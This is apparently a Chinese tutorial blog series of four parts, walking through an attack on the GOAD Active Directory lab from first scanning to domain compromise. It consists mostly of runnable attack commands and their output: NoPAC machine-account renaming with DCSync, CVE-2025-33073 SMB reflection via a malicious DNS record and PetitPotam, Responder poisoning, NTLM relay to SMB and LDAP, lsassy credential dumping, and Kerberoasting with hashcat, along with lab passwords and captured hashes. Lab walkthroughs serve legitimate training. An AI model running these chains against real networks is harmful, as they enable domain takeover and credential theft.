3h1xy

GOAD 域渗透教程 4：NoPAC 利用与 CVE-2025-33073 SMB 反射提权

2026-01-28T13:37:15.000Z

通过前面三篇文章，我们已经从信息收集一路走到了有效域用户。这一篇继续讲两条更像“提权收尾”的链路：NoPAC 和 CVE-2025-33073，分别对应打域控和打未强制 SMB Signing 主机的思路。

这篇文章会学到什么

如何判断当前域环境是否满足 NoPAC 的利用前提
如何通过机器账户伪造、S4U2self 与 DCSync 打到域控
如何利用 CVE-2025-33073 把未强制 SMB Signing 的主机打成 SYSTEM
如何清理实验中创建的 DNS 记录与残留痕迹

NoPAC

我不会重复介绍这个漏洞，网络上有大把的介绍文章和原理分析
GitHub 上有不少自动化利用代码，比如 cube0x0/noPac 和 Ridter/noPac。
我喜欢用Kali，所以我们只在Kali上用手动的方案来进行攻击

检查是否具有该漏洞

这次攻击使用的账户是 north/jon.snow:iknownothing，我们在 Part2 里通过 Kerberoasting 拿到的。

1	nxc smb 192.168.56.0/24 -u 'north\jon.snow' -p 'iknownothing' -M nopac

两次TGT的size不一样，有NoPAC漏洞。

同时我们要检查我们当前使用的域账户是否有添加计算机账户的配额，默认都是10

1	nxc ldap 192.168.56.0/24 -u north\\jon.snow -p iknownothing -M maq

两个条件都满足才能用NoPAC漏洞。（MAQ为0时也可以打，具体由读者自行研究）

工具准备

1	git clone https://github.com/dirkjanm/krbrelayx.git

另外还要准备 renameMachine.py：

https://github.com/ShutdownRepo/impacket/blob/b4fbcf9196e9b6098edae0ae7794005d2e138ccd/examples/renameMachine.py

进行攻击

首先添加一个机器账户

┌──(kali㉿192)-[~]
└─$ impacket-addcomputer north/jon.snow:iknownothing -dc-host WINTERFELL.north.sevenkingdoms.local
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account DESKTOP-14VC7MVS$ with password qas3n40vS6Fwc3F7Wwda0fEvQXzT2AXX.

清除添加的机器中的SPN属性

┌──(kali㉿192)-[~/krbrelayx]
└─$ python3 addspn.py -u 'north\jon.snow' -p iknownothing -t DESKTOP-14VC7MVS$ -c WINTERFELL.north.sevenkingdoms.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] Printing object before clearing
DN: CN=DESKTOP-14VC7MVS,CN=Computers,DC=north,DC=sevenkingdoms,DC=local - STATUS: Read - READ TIME: 2026-03-22T07:12:11.506758
    sAMAccountName: DESKTOP-14VC7MVS$

[+] SPN Modified successfully

将机器账户的 sAMAccountName，更改为 DC 的机器账户名字，注意后缀不带 $

┌──(kali㉿192)-[~/krbrelayx]
└─$ python3 renameMachine.py north/jon.snow:iknownothing -current-name DESKTOP-14VC7MVS$ -new-name WINTERFELL -dc-ip 192.168.56.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Modifying attribute (sAMAccountName) of object (CN=DESKTOP-14VC7MVS,CN=Computers,DC=north,DC=sevenkingdoms,DC=local): (DESKTOP-14VC7MVS$) -> (WINTERFELL)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[*] Target object modified successfully!

用假冒域控的这个机器账户申请TGT

┌──(kali㉿192)-[~/krbrelayx]
└─$ impacket-getTGT north/WINTERFELL:qas3n40vS6Fwc3F7Wwda0fEvQXzT2AXX -dc-ip 192.168.56.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in WINTERFELL.ccache

把名字再改回去

┌──(kali㉿192)-[~/krbrelayx]
└─$ python3  renameMachine.py -current-name 'WINTERFELL' -new-name 'samaccount$' 'north/jon.snow:iknownothing' -dc-ip 192.168.56.11
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Modifying attribute (sAMAccountName) of object (CN=DESKTOP-14VC7MVS,CN=Computers,DC=north,DC=sevenkingdoms,DC=local): (WINTERFELL) -> (samaccount$)
[*] Target object modified successfully!

通过 S4U2self 协议向 DC 请求 ST

export KRB5CCNAME=WINTERFELL.ccache

┌──(kali㉿192)-[~/krbrelayx]
└─$ impacket-getST -self -impersonate 'administrator' -altservice 'CIFS/winterfell.north.sevenkingdoms.local' -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' 'north'/'winterfell'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating administrator
[*] Requesting S4U2self
[*] Changing service from winterfell@NORTH.SEVENKINGDOMS.LOCAL to CIFS/winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL
[*] Saving ticket in administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache

通过获取的ST来进行DCSync

┌──(kali㉿192)-[~/krbrelayx]
└─$ export KRB5CCNAME=administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache

┌──(kali㉿192)-[~/krbrelayx]
└─$ impacket-secretsdump -k -no-pass -dc-ip 192.168.56.11 @'winterfell.north.sevenkingdoms.local'

CVE-2025-33073

前面在 Part3 里只是顺手提了一句，这里把具体打法补完整。这个漏洞的本质，仍然是把目标机器被强制出来的 SMB 认证“反射”回它自己。只要目标没有强制 SMB Signing，最后就有机会直接拿到这台机器的 SYSTEM。

利用前提

这条链子需要满足几个条件：

我们已经有一个普通域用户：north/jon.snow:iknownothing
当前用户能够向域内 DNS 添加记录
目标机器没有强制 SMB Signing
我们能够强制目标对外发起 SMB 认证

在 GOAD 里，我这里选择 CASTELBLACK 作为受害机。原因很简单：它在前面的扫描结果里已经明确显示 signing: False，比去碰 WINTERFELL 这种域控现实得多。

添加恶意 DNS 记录

先往 north.sevenkingdoms.local 的 DNS 里添加一条恶意记录。这里命令最后的 192.168.56.11 只是负责写 DNS 记录的域控，不是最终要打的目标；真正指向的是我们的攻击机 192.168.56.138。

1
2
3

python3 dnstool.py -u 'north\jon.snow' -p 'iknownothing' \
  -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \
  -d 192.168.56.138 --action add 192.168.56.11

这里我直接使用 localhost1UWhRCA... 这条记录名。相比按机器名单独构造记录，这种写法更通用，因为去掉后面的 marshalled target information 之后，剩下的就是 localhost，对不同机器都能复用。

开启中继监听

既然真正的目标是 CASTELBLACK，那么 ntlmrelayx 的中继目标也应该指向它自己：

1	impacket-ntlmrelayx -t smb://castelblack.north.sevenkingdoms.local -smb2support

如果你想在利用成功后继续交互，而不是只看默认的后利用动作，也可以直接打开 SOCKS：

1	impacket-ntlmrelayx -t smb://castelblack.north.sevenkingdoms.local -smb2support --socks

使用 PetitPotam 强制认证

接下来把 CASTELBLACK 的认证强制打到我们刚注册的恶意 DNS 名上：

python3 PetitPotam.py -u 'north\jon.snow' -p 'iknownothing' \
  -d north.sevenkingdoms.local \
  localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \
  castelblack.north.sevenkingdoms.local

如果目标可被强制认证，同时 SMB Signing 没有强制开启，那么 ntlmrelayx 这边通常就能看到认证成功。

成功后的结果

默认情况下，ntlmrelayx 在 SMB 目标上成功反射后，往往会直接执行一套标准后利用动作，例如：

检查并启动 RemoteRegistry
读取目标机器的 SAM
导出本地用户哈希

这已经足够证明我们拿到的是这台机器的高权限上下文了。根据 Synacktiv 的分析，这条链子成功时，最终拿到的是目标机器上的 SYSTEM 身份，而不是一个普通的机器账户权限。

如果你前面开的是 --socks，那后面就可以像 Part3 一样，继续通过代理去跑 smbexec、查看共享文件，或者执行你自己的命令。

这个洞为什么能打

简单理解一下就是：

我们先注册一个特殊格式的 DNS 名，让目标机器访问这个名字时，把它识别成“本地目标”。
然后再强制目标去连接这个名字。
目标发起 SMB 认证时，会走本地 NTLM 认证逻辑。
我们把这份认证再中继回目标自己的 SMB 服务。
由于这次被强制出来的认证来自系统服务，最终就能在目标上拿到 SYSTEM。

也正因为如此，这个洞对 signing: True 的机器就不太好使了。SMB 签名一旦强制开启，整条反射链基本就断了。

清理痕迹

实验做完以后，记得把恶意 DNS 记录删掉。最简单的做法，就是把上面 dnstool.py 里的 --action add 改成 --action delete，记录名保持一致即可。

小结

Part4 里我们主要演示了两条思路：

NoPAC：从普通域用户直接打到域控
CVE-2025-33073：利用 SMB 反射把未强制签名的目标机器打成 SYSTEM

这两条链子都说明了一件事：在域环境里，“拿到一个普通域用户”很多时候已经不是低权限起点了。只要目标配置不严、链路又刚好走得通，后面的空间会非常大。

GOAD 域渗透教程 3：Responder 投毒、NTLM Relay、mitm6 与 LDAP 中继

2025-12-26T17:14:18.000Z

如果你在上一篇《GOAD 域渗透教程 2：域用户枚举、Kerberoasting、BloodHound 与 DNS 信息收集》里已经拿到了有效凭据，这一篇就继续进入投毒和中继。重点会演示 Responder 收集 NetNTLM、NTLM Relay 打 SMB、mitm6 / Inveigh 中继到 LDAP，以及强制认证后的 relay 利用。

这篇文章会学到什么

如何使用 Responder 在 GOAD 里捕获 NetNTLMv2 哈希
如何把拿到的认证流量中继到 SMB 与 LDAP
如何通过 mitm6 / Inveigh 扩大中继面并获取更高权限
如何在中继成功后通过 SOCKS、共享枚举和命令执行继续扩大战果

Responder 投毒

当我们在一个内网里还没有任何凭据时，Responder 基本是必备工具。在一个正常的域环境里（不考虑各种加固和限制），它通常能带来：

有效的域用户名
NetNTLM 哈希
可以拿去做中继的认证流量
以及一堆后续可利用的信息

根据 GOAD 作者 Mayfly 的说法，GOAD 里有两个机器人程序会持续模拟 LLMNR、mDNS 和 NBT-NS 请求。其中一个用户密码强度较低，但没有管理员权限；另一个用户有管理员权限，但密码很强。

我们先在 Kali 攻击机上启动 Responder，看看能不能先收一点东西。

1	sudo responder -I eth0

等几分钟后，就可以拿到 NORTH\eddard.stark 的 NetNTLMv2 哈希：

因为机器人请求的是 Brave，而正确的机器名实际上是 Braave，DNS 无法解析后，Windows 会退回到广播查询。Responder 响应了这类查询，于是就拿到了用户连接。

再等几分钟，我们又收到了 eddard.stark 的连接：

NetNTLM 哈希不能直接做哈希传递，但可以拿去离线破解。先把抓到的两条哈希保存成 responder.hashes：

1
2

robb.stark::NORTH:fca8d2081c5b71bf:2EA257151FB713C887603E116426D61F:010100000000000080D58875AE8DDC01A247999BBB6EBA3D0000000002000800300053003300560001001E00570049004E002D004200440046004B004E0053005800340052005100480004003400570049004E002D004200440046004B004E005300580034005200510048002E0030005300330056002E004C004F00430041004C000300140030005300330056002E004C004F00430041004C000500140030005300330056002E004C004F00430041004C000700080080D58875AE8DDC010600040002000000080030003000000000000000000000000030000036E0FE45B3C6BAC3E8EF83380F40A254675D9659665C87AD87E5FF71D45214450A001000000000000000000000000000000000000900160063006900660073002F0042007200610076006F0073000000000000000000
eddard.stark::NORTH:f7122c456244cda5:A99E8B609BC856E67DB6D865D05957FB:010100000000000080D58875AE8DDC01F842BE9FEDA89C410000000002000800300053003300560001001E00570049004E002D004200440046004B004E0053005800340052005100480004003400570049004E002D004200440046004B004E005300580034005200510048002E0030005300330056002E004C004F00430041004C000300140030005300330056002E004C004F00430041004C000500140030005300330056002E004C004F00430041004C000700080080D58875AE8DDC010600040002000000080030003000000000000000000000000030000036E0FE45B3C6BAC3E8EF83380F40A254675D9659665C87AD87E5FF71D45214450A001000000000000000000000000000000000000900140063006900660073002F004D006500720065006E000000000000000000

然后用 hashcat 开始爆破：

1	hashcat -m 5600 --force -a 0 responder.hashes /usr/share/wordlists/rockyou.txt

很快就能拿到 robb.stark 的密码：sexywolfy。

而 eddard.stark 的密码强度太高，靠这条路子暂时跑不出来，所以接下来就该上中继了。

NTLM 中继

未签名的 SMB

先找出没有启用签名的 SMB 目标。

1	nxc smb 192.168.56.0/24 --gen-relay-list relay.txt

好了，现在我们有了 signing:False SMB 计算机列表，我们可以开始尝试向它们转发 NTLM 身份验证。

先把 Responder 的 SMB 监听和 HTTP 监听关掉，在 /etc/responder/Responder.conf 里把这两项都改成 Off。

然后启动 ntlmrelayx：

1	impacket-ntlmrelayx -tf relay.txt -of netntlm -smb2support -socks --keep-relaying

随后重新打开 Responder：

1	sudo responder -I eth0

等几分钟后收到请求，进入 socks 交互界面，可以看到 eddard.stark 在 192.168.56.22 上是管理员。

现在我们可以利用这个中继以管理员身份访问计算机。

利用 SOCKS 中继后的权限

secretsdump

刚刚启动的 ntlmrelayx 默认会把 SOCKS 代理开在本机 1080 端口。

1	proxychains4 impacket-secretsdump -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

sam 数据库包含本地帐户信息。我们将忽略 vagrant，因为它是设置实验环境的默认用户。
这里的重要信息是本地管理员用户的 NT 哈希值。
我们还获取了最近连接用户的 LSA 缓存（Windows 默认保留最近 10 个用户的缓存），即使域控制器无法访问，这也能帮助我们连接到服务器。但是，这些缓存的凭据可以通过 hashcat 离线破解（速度非常慢）。
最后，我们还获得了计算机帐户的哈希值。（有时，加入域的计算机可能无法获取任何有用的域帐户信息，甚至完全没有相关信息，但如果您获得了此哈希值，则说明您已拥有该域的帐户！）

lsassy

SAM 里没有域用户的明细信息，而登录过的域用户通常会留在 lsass.exe 进程里，所以可以借助 lsassy 把它们捞出来。

Lsassy 允许您远程转储 lsass 文件（比使用 procdump、下载 lsass 转储文件并在本地使用 pypykatz 或 mimikatz 方便得多），它为您完成所有繁琐的操作，例如转储和读取 lsass 内容（它还只转储 lsass 转储中的有用部分，从而优化传输时间）。（lsassy 也以 nxc 模块的形式存在）

1	proxychains4 lsassy --no-pass -d 'NORTH' -u 'EDDARD.STARK' '192.168.56.22'

smbclient

上面这两种方案都比较“响”，有机会触发 EDR 告警；只是这里的 Microsoft Defender 没怎么拦。

单纯用 smbclient 看文件，相对就安静很多。

1	proxychains4 impacket-smbclient -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

smbexec 命令执行

如果你还想进一步执行命令，由于这里走的是 SOCKS 代理，基本只能用 smbexec 或 atexec，wmiexec、psexec 和 dcomexec 都不太行。

1	proxychains4 impacket-smbexec -no-pass 'NORTH'/'EDDARD.STARK'@'192.168.56.22'

Mitm6 / Inveigh + ntlmrelayx 到 LDAP

另一条比较有效的路子，是响应 DHCPv6 请求，把自己的机器塞成默认 DNS。Windows 默认优先走 IPv6，所以可以借助 MITM6 或 Inveigh 劫持并篡改 DHCPv6 响应，把后续查询都引到我们这里。

我们将启动中间人攻击（mitm6）来干扰 DHCPv6，并获取来自主机的 DNS 请求。
顺便提一下，我注意到我们可以毒害域控制器，但之后域控制器并不在意，仍然使用它们的本地主机 DNS 服务器。
所以我们必须对着服务器投毒
在这个例子中，我们将对 Braavos 服务器进行恶意操作。我们将响应 wpad 查询，并将 HTTP 查询转发到 Meereen 上的 LDAPS，以添加一台具有委派访问权限的计算机。

先启动 ntlmrelayx：

1	impacket-ntlmrelayx -6 -wh wpadfakeserver.essos.local -t ldaps://meereen.essos.local --delegate-access

再启动 mitm6：

1	sudo mitm6 -i eth0 -d essos.local -d sevenkingdoms.local -d north.sevenkingdoms.local --debug -4 192.168.56.200

等待 WPAD HTTP 查询被转发到 LDAPS。（如果你不想等，可以直接重启虚拟机来加速触发。）

我们成功添加了一个机器账户 ZXDJDCKA$:fa6g^d8HtF6,vUN，并把 BRAAVOS$ 的委派权限挂给了它。后面就可以用这个账户去 getST，进一步拿到 BRAAVOS 这台机器的权限。

同样地，也可以把这条中继打到 LDAP 上，直接导出域信息（适合中继到的账户权限不够高的情况）。

1	impacket-ntlmrelayx -6 -wh wpadfakeserver.essos.local -t ldap://meereen.essos.local -l /home/kali/temp/

强制认证后 relay 到 LDAP

我们还可以用多种方式（PetitPotam、PrinterBug、DFSCoerce）强制让 Meereen 这台 DC 主动连回我们的机器。为了少折腾不同 PoC，这里直接用一体化工具 Coercer。

正如 hackndo 和 The Hacker Recipes 里解释的那样，如果不借助 CVE-2019-1040（也就是 remove-mic），普通的 SMB 连接是没法直接中继到 LDAP(S) 的。

启动中继，移除 MIC，目标打到 meereen.essos.local 的 LDAPS：

1	impacket-ntlmrelayx -t ldap://meereen.essos.local -smb2support --remove-mic --delegate-access

在 braavos 上触发强制认证。（braavos 是较新的 Windows Server 2016，未授权 PetitPotam 在这里打不动。）

1	python3 Coercer.py coerce -u khal.drogo -d essos.local -p horse -t braavos.essos.local -l 192.168.56.200

攻击成功后，我们拿到了 QVGNFSKR$:ShI(whoIy24c)bb，接下来就能利用 RBCD 去打 braavos。

1	impacket-getST -spn HOST/BRAAVOS.ESSOS.LOCAL -impersonate Administrator -dc-ip 192.168.56.12 'ESSOS.LOCAL/QVGNFSKR$:ShI(whoIy24c)bb'

然后用这张票据直接导出凭据：

1 2	export KRB5CCNAME=Administrator@HOST_BRAAVOS.ESSOS.LOCAL@ESSOS.LOCAL.ccache impacket-secretsdump -k -no-pass ESSOS.LOCAL/'Administrator'@braavos.essos.local

类似的思路也可以套到最近很火的 CVE-2025-33073 去做 Relay 到 SMB，这里就不再展开了。

GOAD 域渗透教程 2：域用户枚举、Kerberoasting、BloodHound 与 DNS 信息收集

2025-12-22T14:38:10.000Z

在上一篇《GOAD 域渗透教程 1：内网扫描、域控识别与初始域用户获取》中，我们已经拿到了第一批域用户。这一篇继续做域信息收集与凭据扩展，重点演示域用户枚举、Kerberoasting、主机信息收集、SMB 枚举、ADIDNS 枚举，以及用 BloodHound 梳理攻击路径。

这篇文章会学到什么

如何在拿到一个域账户后快速枚举整套域用户与主机信息
如何通过 Kerberoasting 获取可离线破解的服务票据
如何使用 ldapdomaindump、adidnsdump 与 SMB 枚举补全攻击面
如何借助 BloodHound 梳理域内横向与提权路径

获取用户列表

当我们在获取到一个域账户后，首先要做的事情就是获取用户列表。

impacket-GetADUsers

1	impacket-GetADUsers -all north.sevenkingdoms.local/samwell.tarly:Heartsbane -dc-ip 192.168.56.11

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Querying 192.168.56.11 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2025-11-30 04:34:14.417277  2025-12-15 12:09:44.933841
Guest                                                               
vagrant                                               2021-05-12 07:39:16.765445  2025-12-22 09:50:15.293602
krbtgt                                                2025-11-30 04:51:04.250812  
arya.stark                                            2025-11-30 06:11:39.441082  
eddard.stark                                          2025-11-30 06:11:41.191046  2025-12-22 09:57:42.152696
catelyn.stark                                         2025-11-30 06:11:42.769169  
robb.stark                                            2025-11-30 06:11:44.332172  2025-12-22 09:59:49.776900
sansa.stark                                           2025-11-30 06:11:45.909966  
brandon.stark                                         2025-11-30 06:11:47.425431  2025-12-21 06:56:44.028014
rickon.stark                                          2025-11-30 06:11:48.925366  
hodor                                                 2025-11-30 06:11:50.394151  2025-12-21 06:56:44.042971
jon.snow                                              2025-11-30 06:11:51.879020  2025-12-07 07:46:10.688271
samwell.tarly                                         2025-11-30 06:11:53.363540  2025-12-20 09:56:59.286260
jeor.mormont                                          2025-11-30 06:11:54.847875  
sql_svc                                               2025-11-30 06:11:56.269877  2025-12-20 09:19:55.407439

ldapsearch

关于 LDAP 查询，我推荐这篇文章：Useful LDAP queries for pentesting。里面基本把常用查询都列全了。

ldapsearch -H ldap://192.168.56.11 -D "samwell.tarly@north.sevenkingdoms.local" -w Heartsbane -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'

通过ldap查询，我们也可以查询到其他域上的用户，因为存在域信任。

查询 sevenkingdoms.local

1	ldapsearch -H ldap://192.168.56.10 -D "samwell.tarly@north.sevenkingdoms.local" -w Heartsbane -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" \| grep 'distinguishedName:'

Kerberoasting

在域中，经常能看到设置了SPN的用户

impacket-GetUserSPNs

我们可以用impacket来查找他们

1	impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/samwell.tarly:Heartsbane -outputfile kerberoasting.hashes

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName                                 Name         MemberOf                                                    PasswordLastSet             LastLogon                   Delegation
---------------------------------------------------  -----------  ----------------------------------------------------------  --------------------------  --------------------------  -----------
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local        2025-11-30 06:11:45.909966  
CIFS/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2025-11-30 06:11:51.879020  2025-12-07 07:46:10.688271  constrained
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2025-11-30 06:11:51.879020  2025-12-07 07:46:10.688271  constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                  2025-11-30 06:11:56.269877  2025-12-20 09:19:55.407439
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                  2025-11-30 06:11:56.269877  2025-12-20 09:19:55.407439



[-] CCache file is not found. Skipping...

这样就把哈希保存到了 kerberoasting.hashes。

使用hashcat破解

1	hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force

获取机器名和系统信息

众所周知，Windows 偶尔会冒出一些“看见版本就想打”的洞，比如 MS17-010。所以在域里把机器名、系统版本、补丁代际先摸清楚，始终是很值得做的。

不走运的是，我们这个域内没有任何的低版本系统（在实验环境里面肯定没有啊，想啥呢，真正的域里面就看你运气咯。）

SMB枚举

1	nxc smb 192.168.56.0/24 -u jon.snow -p iknownothing --shares

实验环境还是啥都没有，真实域环境有时候也会获取到一些有用的文档。

全都要：ldapdomaindump

上面说的域信息，除了SMB枚举外，基本上用ldapdomaindump都能查询。

1	ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11

adidnsdump

再补一点 ldapdomaindump 查不到的内容：我们可以把 computer name 和 IP 对上，便于后续做更有针对性的攻击。

这个工具同样是 dirkjanm 写的：adidnsdump。

┌──(kali㉿kali)-[~/adidnsdump/adidnsdump]
└─$ python3 dnsdump.py -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 8 records, saving to records.csv

BloodHound

最后提一下非常常用的图形化分析工具 BloodHound。

1
2
3

.\sharphound.exe -d north.sevenkingdoms.local -c all --zipfilename bh_north_sevenkingdoms.zip
.\sharphound.exe -d sevenkingdoms.local -c all --zipfilename bh_sevenkingdoms.zip
.\sharphound.exe -d essos.local -c all --zipfilename bh_essos.zip

用 SharpHound 收集完数据后，直接导入 BloodHound 即可。

如果你想深入查看BloodHound，我推荐以下文章，其中包含大量有用的信息和查询：

本文主要参考了 MayFly 的思路。

GOAD 域渗透教程 1：内网扫描、域控识别与初始域用户获取

2025-12-21T07:45:31.000Z

这篇文章从 0 开始，带你在 GOAD 环境里完成第一轮信息收集：内网扫描、识别域控、配置 hosts、匿名枚举域用户，并继续尝试 AS-REP Roasting 和密码喷洒，拿到第一批可用凭据。

这篇文章会学到什么

如何用 NetExec 和 Nmap 对 GOAD 内网做第一轮信息收集
如何根据 SMB Signing、LDAP 与命名信息识别域控和域结构
如何通过匿名枚举、OSINT、AS-REP Roasting 与密码喷洒拿到初始域用户
如何把扫描结果整理成后续域渗透可复用的目标清单

扫描和侦查

网络扫描

NetExec 简单探测

在域渗透中，我们可以通过NetExec进行简单的域内Windows扫描

1	nxc smb 192.168.56.0/24

我们可知当前有三个域

1
2
3

essos.local
sevenkingdoms.local
north.sevenkingdoms.local

看到 signing: True 后，可以先推测这三台机器大概率是域控，再用 LDAP 进一步验证。

1	nxc ldap 192.168.56.0/24

可以确定有三台域控。

配置 HOSTS

我们需要在本地机器上设置hosts文件，以便后续使用Kerberos协议

# /etc/hosts
# GOAD
192.168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12   essos.local meereen.essos.local meereen
192.168.56.22   castelblack.north.sevenkingdoms.local castelblack
192.168.56.23   braavos.essos.local braavos

Nmap 全端口扫描

为了扩充攻击面，我们将对目前已知的机器进行全端口扫描

1	nmap -Pn -p- -sC -sV -oA full_scan 192.168.56.10-12,22-23

参数含义如下：

-Pn：不使用 ping 探活。
-p-：扫描全部端口。
-sC：运行默认侦察脚本。
-sV：探测服务版本。
-oA：同时输出三种格式的结果到 full_scan。

扫描结果太长，这里就不整段贴出了。

分析扫描结果

把 sevenkingdoms.local 和 essos.local 丢进 Google 搜一下，基本就能判断这套命名和《权力的游戏》/《冰与火之歌》有关。虽然这里是靶场，但这种 OSINT 思路在实战里同样有价值。

寻找域用户

在域控上匿名枚举域账号

1	nxc smb 192.168.56.0/24 --users

我们在WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL中枚举到了十个域账号，并且意外收获了一个密码

samwell.tarly:Heartsbane

这些账号我们也可以验证我们在上一步的OSINT，我们寻找的是正确的信息。

有密码时我们可以使用ldapdomaindump来获取域信息。

┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

我们获得了NORTH.SEVENKINGDOMS.LOCAL上所有的账户

OSINT + 暴力枚举账号

我们可以利用上面分析扫描结果时得到的 OSINT 信息去猜测账号名，再按另一个域里已经出现过的命名格式进行枚举。（这种格式在很多域环境里都比较通用。）

可以先写一个简单的 shell 脚本，从网页里抓取相关角色名：

#!/bin/bash

# Fetch webpage and extract character names
curl -s "https://www.hbomax.com/shows/game-of-thrones/4f6b4985-2dc9-4ab6-ac79-d60f0860b0ac/cast-and-crew" | \
grep -o '>[A-Z][a-z]* [A-Z][a-z]*<' | \
sed 's/>//g; s/ | \
awk '
BEGIN { count = 0 }
{
    count++
    if (count > 11 && (count - 12) % 2 == 0) {
        # Convert to lowercase and replace spaces with dots
        name = tolower($0)
        gsub(/ /, ".", name)
        print name
    }
}' | \
sort | uniq

然后用 kerbrute 做用户名枚举：

┌──(kali㉿kali)-[~]
└─$ kerbrute userenum -d essos.local --dc 192.168.56.12 got_users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:32:31 >  Using KDC(s):
2025/12/21 06:32:31 >  192.168.56.12:88

2025/12/21 06:32:31 >  [+] VALID USERNAME: daenerys.targaryen@essos.local
2025/12/21 06:32:31 >  [+] VALID USERNAME: jorah.mormont@essos.local
2025/12/21 06:32:31 >  [+] VALID USERNAME: khal.drogo@essos.local
2025/12/21 06:32:31 >  [+] VALID USERNAME: viserys.targaryen@essos.local
2025/12/21 06:32:36 >  Done! Tested 80 usernames (4 valid) in 5.003 seconds

也可以直接用 Nmap 的 krb5-enum-users 脚本来枚举用户名，这里换到另一个域试一下：

┌──(kali㉿kali)-[~]
└─$ nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:32 EST
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00035s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     robert.baratheon@sevenkingdoms.local
|_    stannis.baratheon@sevenkingdoms.local
MAC Address: 00:0C:29:CC:C8:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

寻找未授权的SMB

┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.0/24 -u 'a' -p '' --shares
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.12   445    MEEREEN          [-] essos.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.23   445    BRAAVOS          [+] essos.local\a: (Guest)
SMB         192.168.56.23   445    BRAAVOS          [*] Enumerated shares
SMB         192.168.56.23   445    BRAAVOS          Share           Permissions     Remark
